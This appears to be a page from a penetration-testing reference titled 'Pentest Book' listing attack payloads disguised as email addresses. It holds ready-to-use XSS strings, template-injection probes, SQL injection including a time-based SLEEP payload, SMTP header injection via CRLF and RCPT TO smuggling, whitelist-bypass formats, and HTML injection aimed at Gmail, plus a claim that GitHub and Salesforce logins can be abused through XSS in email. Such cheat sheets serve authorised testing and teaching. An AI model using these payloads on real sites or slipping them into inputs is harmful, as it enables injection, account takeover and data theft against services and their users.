Pentest Book
Search…
Email attacks
Attack
Payload
XSS
test+(alert(0))@example.com
[email protected](alert(0)).com
"alert(0)"@example.com
<script src=//xsshere?”@email.com
Template injection
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
SQLi
"' OR 1=1 -- '"@example.com
"mail'); SELECT version();--"@example.com
a'-IF(LENGTH(database())=9,SLEEP(7),0)or'1'='1\"@a.com
Parameter Pollution
(Email) Header Injection
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>\r\nRCPT TO:<victim+"@test.com
Wildcard abuse
%@example.com
1
# Bypass whitelist
2
inti(;[email protected];)@whitelisted.com
3
[email protected](@whitelisted.com)
4
inti+(@whitelisted.com;)@inti.io
5
6
#HTML Injection in Gmail
7
inti.de.ceukelaire+(<b>bold<u>underline<s>strike<br/>newline<strong>strong<sup>sup<sub>sub)@gmail.com
8
9
# Bypass strict validators
10
# Login with SSO & integrations
11
GitHub & Salesforce allow xss in email, create account and abuse with login integration
12
13
# Common email accounts
21
bug(s)@
Copied!
Last modified 10mo ago
Export as PDF
Copy link